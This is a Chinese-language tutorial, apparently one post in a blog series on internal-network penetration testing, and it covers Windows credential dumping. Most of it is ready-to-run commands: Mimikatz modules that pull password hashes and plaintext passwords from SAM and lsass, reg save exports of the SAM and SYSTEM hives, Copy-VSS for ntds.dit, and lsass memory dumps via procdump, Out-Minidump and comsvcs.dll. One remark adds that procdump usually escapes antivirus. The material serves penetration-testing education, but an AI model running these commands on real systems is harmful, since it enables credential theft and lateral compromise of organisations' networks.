系列文章第一章節(jié)之基礎(chǔ)知識篇

內(nèi)網(wǎng)滲透(一)之基礎(chǔ)知識-內(nèi)網(wǎng)滲透介紹和概述
內(nèi)網(wǎng)滲透(二)之基礎(chǔ)知識-工作組介紹
內(nèi)網(wǎng)滲透(三)之基礎(chǔ)知識-域環(huán)境的介紹和優(yōu)點
內(nèi)網(wǎng)滲透(四)之基礎(chǔ)知識-搭建域環(huán)境
內(nèi)網(wǎng)滲透(五)之基礎(chǔ)知識-Active Directory活動目錄介紹和使用
內(nèi)網(wǎng)滲透(六)之基礎(chǔ)知識-域中的權(quán)限劃分和基本思想
內(nèi)網(wǎng)滲透(七)之基礎(chǔ)知識-企業(yè)常見安全域劃分和結(jié)構(gòu)
內(nèi)網(wǎng)滲透(八)之基礎(chǔ)知識-企業(yè)域中計算機(jī)分類和專業(yè)名

系列文章第二章節(jié)之內(nèi)網(wǎng)信息收集篇

內(nèi)網(wǎng)滲透(九)之內(nèi)網(wǎng)信息收集-手動本地信息收集
內(nèi)網(wǎng)滲透(十)之內(nèi)網(wǎng)信息收集-編寫自動化腳本收集本地信息
內(nèi)網(wǎng)滲透(十一)之內(nèi)網(wǎng)信息收集-內(nèi)網(wǎng)IP掃描和發(fā)現(xiàn)
內(nèi)網(wǎng)滲透(十二)之內(nèi)網(wǎng)信息收集-內(nèi)網(wǎng)端口掃描和發(fā)現(xiàn)
內(nèi)網(wǎng)滲透(十三)之內(nèi)網(wǎng)信息收集-收集域環(huán)境中的基本信息
內(nèi)網(wǎng)滲透(十四)之內(nèi)網(wǎng)信息收集-域環(huán)境中查找域內(nèi)用戶基本信息
內(nèi)網(wǎng)滲透(十五)之內(nèi)網(wǎng)信息收集-域環(huán)境中定位域管理員
內(nèi)網(wǎng)滲透(十六)之內(nèi)網(wǎng)信息收集-powershell基礎(chǔ)知識
內(nèi)網(wǎng)滲透(十七)之內(nèi)網(wǎng)信息收集-powershell收集域內(nèi)信息和敏感數(shù)據(jù)定位

系列文章第三章節(jié)之Windows協(xié)議認(rèn)證和密碼抓取篇

內(nèi)網(wǎng)滲透(十八)之Windows協(xié)議認(rèn)證和密碼抓取-本地認(rèn)證(NTML哈希和LM哈希）
內(nèi)網(wǎng)滲透(十九)之Windows協(xié)議認(rèn)證和密碼抓取-網(wǎng)絡(luò)認(rèn)證(基于挑戰(zhàn)響應(yīng)認(rèn)證的NTLM協(xié)議)
內(nèi)網(wǎng)滲透(二十)之Windows協(xié)議認(rèn)證和密碼抓取-域認(rèn)證(Kerberos協(xié)議)
內(nèi)網(wǎng)滲透(二十一)之Windows協(xié)議認(rèn)證和密碼抓取-Golden Ticket黃金票據(jù)制作原理及利用方式
內(nèi)網(wǎng)滲透(二十二)之Windows協(xié)議認(rèn)證和密碼抓取-Silver Ticket白銀票據(jù)制作原理及利用方式
內(nèi)網(wǎng)滲透(二十三)之Windows協(xié)議認(rèn)證和密碼抓取-Mimikatz介紹和各種模塊使用方法

注：閱讀本編文章前，請先閱讀系列文章，以免造成看不懂的情況！

Mimikatz在線讀取sam和lsass獲取密碼

在線讀取sam文件

使用mimikatz在線讀取sam文件

分開的命令如下
privilege::debug
token:elevate
lsadump::sam

一句話執(zhí)行的命令如下
mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam"

在線讀取lsass進(jìn)程

從lsass進(jìn)程中提取passwords、keys、pin、tickets等信息

privilege::debug
sekurlsa::msv 獲取HASH (LM,NTLM)
sekurlsa::wdigest 通過可逆的方式去內(nèi)存中讀取明文密碼
sekurlsa::Kerberos 假如域管理員正好在登陸了我們的電腦，我們可以通過這個命令來獲取域管理員的明文密碼
sekurlsa::tspkg 通過tspkg讀取明文密碼
sekurlsa::livessp 通過livessp 讀取明文密碼
sekurlsa::ssp 通過ssp 讀取明文密碼
sekurlsa::logonPasswords 通過以上各種方法讀取明文密碼

Mimikatz離線讀取sam和lsass獲取密碼

離線讀取sam文件

1、通過reg命令無工具導(dǎo)出sam和system文件

reg save hklm\sam sam.hive
reg save hklm\system system.hive

2、通過nishang中的Copy-VSS進(jìn)行復(fù)制，如果這個腳本運(yùn)行在了 DC服務(wù)器上，ntds.dit 和 SYSTEM hive也能被拷貝出來

copy‐vss //直接將文件保存在當(dāng)前目錄下
copy‐vss ‐DestinationDir 路徑 //指定保存文件的路徑（必須是已經(jīng)存在的路徑）

3、讀取sam和system文件獲取密碼

lsadump::sam /sam:sam.hive /system:system.hive

離線讀取讀取lsass進(jìn)程

導(dǎo)出lsass文件方式

1、使用任務(wù)管理器導(dǎo)出

然后將lsass.DMP文件拷貝到當(dāng)前目錄下，mimikatz讀取就好了

2、使用procdump 導(dǎo)出lsass.dmp文件

ProcDump 是一個命令行實用工具，其主要用途是在管理員或開發(fā)人員可用于確定峰值原因的峰值期間監(jiān)視 CPU峰值和生成故障轉(zhuǎn)儲的應(yīng)用程序。 ProcDump 還包括使用窗口掛起 (使用相同的窗口掛起定義，Windows任務(wù)管理器使用) 、未經(jīng)處理的異常監(jiān)視，并且可以根據(jù)系統(tǒng)性能計數(shù)器的值生成轉(zhuǎn)儲。 它還可用作可在其他腳本中嵌入的常規(guī)進(jìn)程轉(zhuǎn)儲實用工具。因為是微軟的所以一般不會被殺軟殺掉

procdump.exe ‐accepteula ‐ma lsass.exe lsass.dmp

3、使用PowerSploit 的Out-MiniDump模塊，PowerSploit是一個基于 Powershell 的滲透工具包，可以選擇創(chuàng)建進(jìn)程的完整內(nèi)存轉(zhuǎn)儲

項目地址：Out-MiniDump模塊下載

Import-Module .\Out-Minidump.ps1 //導(dǎo)入模塊
Get-Process lsass | Out-Minidump

4、comsvcs.dll，系統(tǒng)自帶。通過comsvcs.dll的導(dǎo)出函數(shù)MiniDump實現(xiàn)dump內(nèi)存

首先查看lsass.exe進(jìn)程PID:

tasklist | findstr lsass.exe

使用powershell導(dǎo)出：

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 616  C:\Users\apache\Desktop\lsass.dmp full

5、讀取lsass.dmp文件

使用mimikatz讀取lsass.dmp文件

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"